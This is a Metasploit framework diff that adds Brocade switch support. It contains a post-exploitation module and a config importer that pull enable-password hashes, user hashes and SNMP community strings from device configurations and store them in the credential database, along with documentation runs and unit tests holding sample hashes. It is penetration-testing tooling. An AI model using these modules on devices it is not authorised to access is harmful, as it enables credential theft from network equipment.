Land #11927, Add Brocade post module and config parser

documentation/modules/auxiliary/admin/brocade/brocade_config.md

@@ -0,0 +1,50 @@
+## General Notes
+
+This module imports a Brocade configuration file into the database.
+This is similar to `post/brocade/gather/enum_brocade` only access isn't required,
+and assumes you already have the file.
+
+Example files for import can be found on git, like [this](https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/brocade_08.0.30hT311_ic_icx6430.conf).
+
+## Verification Steps
+
+1. Have a Brocade configuration file
+2. Start `msfconsole`
+3. `use auxiliary/admin/brocade/brocade_config`
+4. `set RHOST x.x.x.x`
+5. `set CONFIG /tmp/file.config`
+6. `run`
+
+## Options
+
+  **RHOST**
+
+  Needed for setting services and items to.  This is relatively arbitrary.
+
+  **CONFIG**
+
+  File path to the configuration file.
+
+## Scenarios
+
+```
+msf5 > wget https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/brocade_08.0.30hT311_ic_icx6430.conf -o /dev/null -O /tmp/brocade.conf
+msf5 > use auxiliary/admin/brocade/brocade_config
+msf5 auxiliary(admin/brocade/brocade_config) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 auxiliary(admin/brocade/brocade_config) > set config /tmp/brocade.conf
+config => /tmp/brocade.conf
+msf5 auxiliary(admin/brocade/brocade_config) > run
+[*] Running module against 127.0.0.1
+
+[*] Importing config
+[+] password-display is enabled, hashes will be displayed in config
+[+] enable password hash $1$QP3H93Wm$uxYAs2HmAK0lQiP3ig5tm.
+[+] User brocade of type 8 found with password hash $1$f/uxhovU$dST5lNskZCPQe/5QijULi0.
+[+] ENCRYPTED SNMP community $MlVzZCFAbg== with permissions ro
+[+] ENCRYPTED SNMP community $U2kyXj1k with permissions rw
+[+] Config import successful
+[*] Auxiliary module execution completed
+```
+
+

documentation/modules/post/brocade/gather/enum_brocade.md

@@ -0,0 +1,93 @@
+## Vulnerable Application
+
+  This module has been tested on the following hardware/OS combinations.
+
+  * Brocade ICX 6430-24
+    * Firmware: 08.0.20T311
+
+  The ICX config can be found [no passwords](https://github.com/h00die/MSF-Testing-Scripts/blob/master/brocade_icx6430_nopass.conf), 
+  [hashes](https://github.com/h00die/MSF-Testing-Scripts/blob/master/brocade_icx6430_pass.conf)
+
+  This module will look for the follow parameters which contain credentials:
+
+  * FastIron
+    * `show configuration`
+
+!!! keep in mind 'password-display' http://wwwaem.brocade.com/content/html/en/command-reference-guide/fastiron-08040-commandref/GUID-169889CD-1A74-4A23-AC78-38796692374F.html
+!!! need to be able to give a password to enable
+
+    * super-user-password
+    * username
+    * SNMP
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Get a shell
+  3. Do: ```use post/brocade/gather/enum_brocade```
+  4. Do: ```set session [id]```
+  5. Do: ```set verbose true```
+  6. Do: ```run```
+
+## Scenarios
+
+### ICX 6430-24, FastIron 08.0.20T311
+
+#### SSH Session with password-display off
+
+```
+resource (brocade.rb)> use post/brocade/gather/enum_brocade
+resource (brocade.rb)> set session 1
+session => 1
+resource (brocade.rb)> set verbose true
+verbose => true
+resource (brocade.rb)> run
+[*] In a non-enabled cli
+[*] Getting version information
+[*] OS: 08.0.30hT311
+[+] Version information stored in to loot /root/.msf4/loot/20190601203656_default_10.0.4.51_brocade.version_751557.txt
+[*] Gathering info from show configuration
+[!] password-display is disabled, no password hashes displayed in config
+[*] Post module execution completed
+```
+
+#### SSH Session with Enable run 
+
+```
+resource (brocade.rb)> use post/brocade/gather/enum_brocade
+resource (brocade.rb)> set session 1
+session => 1
+resource (brocade.rb)> set verbose true
+verbose => true
+[*] In an enabled cli
+[*] Getting version information
+[*] OS: 08.0.30hT311
+[+] Version information stored in to loot /root/.msf4/loot/20190601221921_default_10.0.4.51_brocade.version_839783.txt
+[*] Gathering info from show configuration
+[+] password-display is enabled, hashes will be displayed in config
+[+] enable password hash $1$QP3H93Wm$uxYAs2HmAK0lQiP3ig5tm.
+[+] User brocade of type 8 found with password hash $1$f/uxhovU$dST5lNskZCPQe/5QijULi0.
+[+] ENCRYPTED SNMP community $MlVzZCFAbg== with permissions ro
+[+] ENCRYPTED SNMP community $U2kyXj1k with permissions rw
+[*] Post module execution completed
+msf5 post(brocade/gather/enum_brocade) > loot
+
+Loot
+====
+
+host       service  type             name         content     info                   path
+----       -------  ----             ----         -------     ----                   ----
+10.0.4.51           brocade.version  version.txt  text/plain  Brocade Version        /root/.msf4/loot/20190601221959_default_10.0.4.51_brocade.version_003751.txt
+10.0.4.51           brocade.config   config.txt   text/plain  Brocade Configuration  /root/.msf4/loot/20190601222004_default_10.0.4.51_brocade.config_998514.txt
+
+msf5 post(brocade/gather/enum_brocade) > creds
+Credentials
+===========
+
+host       origin     service         public   private                             realm  private_type
+----       ------     -------         ------   -------                             -----  ------------
+10.0.4.51  10.0.4.51  22/tcp          enable   $1$QP3H93Wm$uxYAs2HmAK0lQiP3ig5tm.         Nonreplayable hash
+10.0.4.51  10.0.4.51  161/udp (snmp)           $MlVzZCFAbg==                              Nonreplayable hash
+10.0.4.51  10.0.4.51  161/udp (snmp)           $U2kyXj1k                                  Nonreplayable hash
+10.0.4.51  10.0.4.51  22/tcp          brocade  $1$f/uxhovU$dST5lNskZCPQe/5QijULi0         Nonreplayable hash
+```

lib/metasploit/framework/login_scanner/ssh.rb

@@ -146,6 +146,12 @@ module Metasploit
                 # Juniper JunOS CLI
                 elsif proof =~ /unknown command: id/
                   proof = ssh_socket.exec!("show version\n").split("\n")[2..4].join(", ").to_s
+                # Brocade CLI
+                elsif proof =~ /Invalid input -> id/ || proof =~ /Protocol error, doesn't start with scp\!/
+                  proof = ssh_socket.exec!("show version\n").to_s
+                  if proof =~ /Version:(?<os_version>.+).+HW: (?<hardware>)/mi
+                    proof = "Model: #{hardware}, OS: #{os_version}"
+                  end
                 else
                   proof << ssh_socket.exec!("help\n?\n\n\n").to_s
                 end

lib/msf/core/auxiliary/brocade.rb

@@ -0,0 +1,128 @@
+# -*- coding: binary -*-
+module Msf
+
+###
+#
+# This module provides methods for working with Brocade equipment
+#
+###
+module Auxiliary::Brocade
+  include Msf::Auxiliary::Report
+
+  def create_credential_and_login(opts={})
+    return nil unless active_db?
+
+    if self.respond_to?(:[]) and self[:task]
+      opts[:task_id] ||= self[:task].record.id
+    end
+
+    core               = opts.fetch(:core, create_credential(opts))
+    access_level       = opts.fetch(:access_level, nil)
+    last_attempted_at  = opts.fetch(:last_attempted_at, nil)
+    status             = opts.fetch(:status, Metasploit::Model::Login::Status::UNTRIED)
+
+    login_object = nil
+    retry_transaction do
+      service_object = create_credential_service(opts)
+      login_object = Metasploit::Credential::Login.where(core_id: core.id, service_id: service_object.id).first_or_initialize
+
+      if opts[:task_id]
+        login_object.tasks << Mdm::Task.find(opts[:task_id])
+      end
+
+      login_object.access_level      = access_level if access_level
+      login_object.last_attempted_at = last_attempted_at if last_attempted_at
+      if status == Metasploit::Model::Login::Status::UNTRIED
+        if login_object.last_attempted_at.nil?
+          login_object.status = status
+        end
+      else
+        login_object.status = status
+      end
+      login_object.save!
+    end
+
+    login_object
+  end
+  
+
+  def brocade_config_eater(thost, tport, config)
+    # this is for brocade type devices.
+    # It is similar to cisco
+    # Docs: enable password-display -> http://wwwaem.brocade.com/content/html/en/command-reference-guide/fastiron-08040-commandref/GUID-169889CD-1A74-4A23-AC78-38796692374F.html
+
+    credential_data = {
+      address: thost,
+      port: tport,
+      protocol: 'tcp',
+      workspace_id: myworkspace.id,
+      origin_type: :service,
+      service_name: '',
+      module_fullname: self.fullname,
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }
+
+    store_loot('brocade.config', 'text/plain', thost, config.strip, 'config.txt', 'Brocade Configuration')
+
+    # Brocade has this one configuration called "password display". With it, we get hashes. With out it, just ...
+    if config =~ /enable password-display/
+      print_good('password-display is enabled, hashes will be displayed in config')
+    else
+      print_bad('password-display is disabled, no password hashes displayed in config')
+    end
+
+    # enable password
+    # Example lines:
+    # enable super-user-password 8 $1$QP3H93Wm$uxYAs2HmAK01QiP3ig5tm.
+    config.scan(/enable super-user-password 8 (?<admin_password_hash>.+)/i).each do |result|
+      admin_hash = result[0].strip
+      unless admin_hash == '.....'
+        print_good("enable password hash #{admin_hash}")
+        cred = credential_data.dup
+        cred[:username] = 'enable'
+        cred[:private_data] = admin_hash
+        cred[:private_type] = :nonreplayable_hash
+        create_credential_and_login(cred)
+      end
+    end
+
+    # user account
+    # Example lines:
+    # username brocade password 8 $1$YBaHUWpr$PzeUrP0XmVOyVNM5rYy99/
+    config.scan(/username "?(?<user_name>[a-z0-9]+)"? password (?<user_type>\w+) (?<user_hash>[0-9a-z=\$\/]{34})/i).each do |result|
+      user_name = result[0].strip
+      user_type  = result[1].strip
+      user_hash = result[2].strip
+      unless user_hash == '.....'
+        print_good("User #{user_name} of type #{user_type} found with password hash #{user_hash}.")
+        cred = credential_data.dup
+        cred[:username] = user_name
+        cred[:private_data] = user_hash
+        cred[:private_type] = :nonreplayable_hash
+        create_credential_and_login(cred)
+      end
+    end
+
+    # snmp
+    # Example lines: 
+    # snmp-server community 1 $Si2^=d rw
+    # these at times look base64 encoded, which they may be, but are also encrypted
+    config.scan(/snmp-server community (?<snmp_id>[\d]+) (?<snmp_community>.+) (?<snmp_permissions>rw|ro)/i).each do |result|
+      snmp_community = result[1].strip
+      snmp_permissions = result[2].strip
+      unless snmp_community == '.....'
+        print_good("#{'ENCRYPTED ' if snmp_community.start_with?('$')}SNMP community #{snmp_community} with permissions #{snmp_permissions}")
+        cred = credential_data.dup
+        cred[:protocol] = 'udp'
+        cred[:port] = 161
+        cred[:service_name] = 'snmp'
+        cred[:private_data] = snmp_community
+        cred[:private_type] = :nonreplayable_hash
+        create_credential_and_login(cred)
+      end
+    end
+
+  end
+end
+end
+

lib/msf/core/auxiliary/mixins.rb

@@ -21,6 +21,7 @@ require 'msf/core/auxiliary/login'
 require 'msf/core/auxiliary/rservices'
 require 'msf/core/auxiliary/cisco'
 require 'msf/core/auxiliary/juniper'
+require 'msf/core/auxiliary/brocade'
 require 'msf/core/auxiliary/kademlia'
 require 'msf/core/auxiliary/llmnr'
 require 'msf/core/auxiliary/mdns'

lib/msf/core/module/platform.rb

@@ -411,6 +411,14 @@ class Msf::Module::Platform
     Alias = "unifi"
   end
 
+  #
+  # Brocade
+  #
+  class Brocade < Msf::Module::Platform
+    Rank = 100
+    Alias = "brocade"
+  end
+
   #
   # Solaris
   #

lib/msf/core/payload/uuid.rb

@@ -76,6 +76,7 @@ class Msf::Payload::UUID
     25 => 'apple_ios',
     26 => 'juniper',
     27 => 'unifi',
+    28 => 'brocade',
   }
 
   # The raw length of the UUID structure

modules/auxiliary/admin/brocade/brocade_config.rb

@@ -0,0 +1,40 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/auxiliary/brocade'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Brocade
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'Brocade Configuration Importer',
+      'Description'   => %q{
+        This module imports a Brocade device configuration.
+        },
+      'License'       => MSF_LICENSE,
+      'Author'        => [ 'h00die'],
+    ))
+
+    register_options(
+      [
+        OptPath.new('CONFIG', [true, 'Path to configuration to import']),
+        Opt::RHOST(),
+        Opt::RPORT(22)
+      ])
+
+  end
+
+  def run
+    unless ::File.exist?(datastore['CONFIG'])
+      fail_with Failure::BadConfig, "Brocade config file #{datastore['CONFIG']} does not exists!"
+    end
+    brocade_config = ::File.open(datastore['CONFIG'], "rb")
+    print_status('Importing config')
+    brocade_config_eater(datastore['RHOSTS'],datastore['RPORT'],brocade_config.read)
+    print_good('Config import successful')
+  end
+end
+
+

modules/post/brocade/gather/enum_brocade.rb

@@ -0,0 +1,97 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/auxiliary/brocade'
+
+class MetasploitModule < Msf::Post
+  include Msf::Auxiliary::Brocade
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'Brocade Gather Device General Information',
+      'Description'   => %q{
+        This module collects Brocade device information and configuration.
+        This module has been tested against an icx6430 running 08.0.20T311.
+        },
+      'License'       => MSF_LICENSE,
+      'Author'        => [ 'h00die'],
+      'Platform'      => [ 'brocade'],
+      'SessionTypes'  => [ 'shell' ]
+    ))
+  end
+
+  def run
+    # Get device prompt
+    prompt = session.shell_command("\n")
+
+    if prompt.end_with?('(config)#') # config shell
+      vprint_status('In a config cli')
+      session.shell_write("skip-page-display\n")
+      session.shell_write("terminal length 0\n")
+    elsif prompt.end_with?('#') # regular cli shell (non-config)
+      vprint_status('In an enabled cli')
+      session.shell_write("skip-page-display\n")
+      session.shell_write("terminal length 0\n")
+    elsif prompt.end_with?('>') # cli not enabled
+      vprint_status('In a non-enabled cli')
+    end
+
+    # attempt to disable paging, cli not enabled this will fail anyways
+    session.shell_write("skip-page-display\n")
+    session.shell_write("terminal length 0\n")
+
+    # Get version info
+    print_status('Getting version information')
+    version_out = session.shell_command("show version\n")
+    if /^, Version: (?<ver>.+) | SW: Version (?<ver>.+) /i =~ version_out
+      vprint_status("OS: #{ver}")
+    end
+
+    ver_loc = store_loot('brocade.version',
+      'text/plain',
+      session,
+      version_out.strip,
+      'version.txt',
+      'Brocade Version')
+
+    # Print the version of VERBOSE set to true.
+    vprint_good("Version information stored in to loot #{ver_loc}")
+
+    # run additional information gathering
+    enum_configs(prompt)
+  end
+
+  # run commands found in exec mode under privilege 1
+  def enum_configs(prompt)
+    host,port = session.session_host, session.session_port
+    exec_commands = [
+      {
+        'cmd'  => 'show configuration',
+        'fn'   => 'get_config',
+        'desc' => 'Get Device Config on Brocade Device'
+      },
+    ]
+    exec_commands.each do |ec|
+      command = ec['cmd']
+      cmd_out = session.shell_command(command).gsub(/#{command}|#{prompt}/,"")
+      print_status("Gathering info from #{command}")
+      # detect if we're in pagination and get as much data as possible
+      if cmd_out.include?('--More--')
+        cmd_out += session.shell_command(" \n"*20) #20 pages *should* be enough
+      end
+      if ec['fn'] == 'get_config'
+        brocade_config_eater(host,port,cmd_out.strip)
+      else
+        cmd_loc = store_loot("brocade.#{ec['fn']}",
+          "text/plain",
+          session,
+          cmd_out.strip,
+          "#{ec['fn']}.txt",
+          ec['desc'])
+        vprint_good("Saving to #{cmd_loc}")
+      end
+    end
+  end
+end
+

spec/lib/msf/core/auxiliary/brocade_spec.rb

@@ -0,0 +1,181 @@
+# -*- coding: binary -*-
+require 'spec_helper'
+
+require 'msf/core/auxiliary/brocade'
+
+RSpec.describe Msf::Auxiliary::Brocade do
+  class DummyClass
+    include Msf::Auxiliary::Brocade
+    def framework
+      Msf::Simple::Framework.create(
+          'ConfigDirectory' => Rails.root.join('spec', 'dummy', 'framework', 'config').to_s,
+          # don't load any module paths so we can just load the module under test and save time
+          'DeferModuleLoads' => true
+      )
+    end
+    def active_db?
+      true
+    end
+    def print_good(str=nil)
+      raise StandardError.new("This method needs to be stubbed.")
+    end
+    def print_bad(str=nil)
+      raise StandardError.new("This method needs to be stubbed.")
+    end
+    def store_cred(hsh=nil)
+      raise StandardError.new("This method needs to be stubbed.")
+    end
+    def fullname
+      "auxiliary/scanner/snmp/brocade_dummy"
+    end
+    def myworkspace
+      raise StandardError.new("This method needs to be stubbed.")
+    end
+  end
+  
+  subject(:aux_brocade) { DummyClass.new }
+  
+  let!(:workspace) { FactoryBot.create(:mdm_workspace) }
+    
+  context '#create_credential_and_login' do
+    
+    let(:session) { FactoryBot.create(:mdm_session) }
+
+    let(:task) { FactoryBot.create(:mdm_task, workspace: workspace)}
+
+    let(:user) { FactoryBot.create(:mdm_user)}
+
+    subject(:test_object) { DummyClass.new }
+    
+    let(:workspace) { FactoryBot.create(:mdm_workspace) }
+    let(:service) { FactoryBot.create(:mdm_service, host: FactoryBot.create(:mdm_host, workspace: workspace)) }
+    let(:task) { FactoryBot.create(:mdm_task, workspace: workspace) }
+    
+    let(:login_data) {
+      {
+        address: service.host.address,
+        port: service.port,
+        service_name: service.name,
+        protocol: service.proto,
+        workspace_id: workspace.id,
+        origin_type: :service,
+        module_fullname: 'auxiliary/scanner/smb/smb_login',
+        realm_key: 'Active Directory Domain',
+        realm_value: 'contosso',
+        username: 'Username',
+        private_data: 'password',
+        private_type: :password,
+        status: Metasploit::Model::Login::Status::UNTRIED
+      }
+    }
+    
+    it 'creates a Metasploit::Credential::Login' do
+      expect{test_object.create_credential_and_login(login_data)}.to change{Metasploit::Credential::Login.count}.by(1)
+    end
+    it "associates the Metasploit::Credential::Core with a task if passed" do
+      login = test_object.create_credential_and_login(login_data.merge(task_id: task.id))
+      expect(login.tasks).to include(task)
+    end
+  end
+
+  context '#brocade_config_eater' do
+    before(:example) do
+      expect(aux_brocade).to receive(:myworkspace).at_least(:once).and_return(workspace)
+    end
+    
+    it 'deals with enable passwords' do
+      expect(aux_brocade).to receive(:print_good).with('enable password hash $1$QP3H93Wm$uxYAs2HmAK01QiP3ig5tm.')
+      expect(aux_brocade).to receive(:print_bad).with('password-display is disabled, no password hashes displayed in config')
+      expect(aux_brocade).to receive(:store_loot).with(
+        "brocade.config", "text/plain", "127.0.0.1", "enable super-user-password 8 $1$QP3H93Wm$uxYAs2HmAK01QiP3ig5tm.", "config.txt", "Brocade Configuration"
+      )
+      expect(aux_brocade).to receive(:create_credential_and_login).with(
+        {
+          address: "127.0.0.1",
+          port: 161,
+          protocol: "tcp",
+          workspace_id: workspace.id,
+          origin_type: :service,
+          service_name: '',
+          module_fullname: "auxiliary/scanner/snmp/brocade_dummy",
+          username: 'enable',
+          private_data: "$1$QP3H93Wm$uxYAs2HmAK01QiP3ig5tm.",
+          private_type: :nonreplayable_hash,
+          status: Metasploit::Model::Login::Status::UNTRIED
+        }
+      )
+      aux_brocade.brocade_config_eater('127.0.0.1',161,'enable super-user-password 8 $1$QP3H93Wm$uxYAs2HmAK01QiP3ig5tm.')
+    end
+
+    it 'deals with user passwords' do
+      expect(aux_brocade).to receive(:print_good).with('User brocade of type 8 found with password hash $1$YBaHUWpr$PzeUrP0XmVOyVNM5rYy99/.')
+      expect(aux_brocade).to receive(:print_bad).with('password-display is disabled, no password hashes displayed in config')
+      expect(aux_brocade).to receive(:store_loot).with(
+        "brocade.config", "text/plain", "127.0.0.1", "username brocade password 8 $1$YBaHUWpr$PzeUrP0XmVOyVNM5rYy99/", "config.txt", "Brocade Configuration"
+      )
+      expect(aux_brocade).to receive(:create_credential_and_login).with(
+        {
+          address: "127.0.0.1",
+          port: 161,
+          protocol: "tcp",
+          workspace_id: workspace.id,
+          origin_type: :service,
+          service_name: '',
+          module_fullname: "auxiliary/scanner/snmp/brocade_dummy",
+          username: 'brocade',
+          private_data: "$1$YBaHUWpr$PzeUrP0XmVOyVNM5rYy99/",
+          private_type: :nonreplayable_hash,
+          status: Metasploit::Model::Login::Status::UNTRIED
+        }
+      )
+      aux_brocade.brocade_config_eater('127.0.0.1',161,'username brocade password 8 $1$YBaHUWpr$PzeUrP0XmVOyVNM5rYy99/')
+    end
+
+    it 'deals with snmp communities' do
+      expect(aux_brocade).to receive(:print_good).with('ENCRYPTED SNMP community $Si2^=d with permissions rw')
+      expect(aux_brocade).to receive(:print_bad).with('password-display is disabled, no password hashes displayed in config')
+      expect(aux_brocade).to receive(:store_loot).with(
+        "brocade.config", "text/plain", "127.0.0.1", "snmp-server community 1 $Si2^=d rw", "config.txt", "Brocade Configuration"
+      )
+      expect(aux_brocade).to receive(:create_credential_and_login).with(
+        {
+          address: "127.0.0.1",
+          port: 161,
+          protocol: "udp",
+          workspace_id: workspace.id,
+          origin_type: :service,
+          service_name: 'snmp',
+          module_fullname: "auxiliary/scanner/snmp/brocade_dummy",
+          private_data: "$Si2^=d",
+          private_type: :nonreplayable_hash,
+          status: Metasploit::Model::Login::Status::UNTRIED
+        }
+      )
+      aux_brocade.brocade_config_eater('127.0.0.1',161,'snmp-server community 1 $Si2^=d rw')
+    end
+    it 'deals with enable hidden passwords' do
+      expect(aux_brocade).to receive(:print_bad).with('password-display is disabled, no password hashes displayed in config')
+      expect(aux_brocade).to receive(:store_loot).with(
+        "brocade.config", "text/plain", "127.0.0.1", "enable super-user-password 8 .....", "config.txt", "Brocade Configuration"
+      )
+      aux_brocade.brocade_config_eater('127.0.0.1',161,'enable super-user-password 8 .....')
+    end
+
+    it 'deals with user hidden passwords' do
+      expect(aux_brocade).to receive(:print_bad).with('password-display is disabled, no password hashes displayed in config')
+      expect(aux_brocade).to receive(:store_loot).with(
+        "brocade.config", "text/plain", "127.0.0.1", "username brocade password 8 .....", "config.txt", "Brocade Configuration"
+      )
+      aux_brocade.brocade_config_eater('127.0.0.1',161,'username brocade password 8 .....')
+    end
+
+    it 'deals with snmp communities' do
+      expect(aux_brocade).to receive(:print_bad).with('password-display is disabled, no password hashes displayed in config')
+      expect(aux_brocade).to receive(:store_loot).with(
+        "brocade.config", "text/plain", "127.0.0.1", "snmp-server community 1 ..... rw", "config.txt", "Brocade Configuration"
+      )
+      aux_brocade.brocade_config_eater('127.0.0.1',161,'snmp-server community 1 ..... rw')
+    end
+  end
+  
+end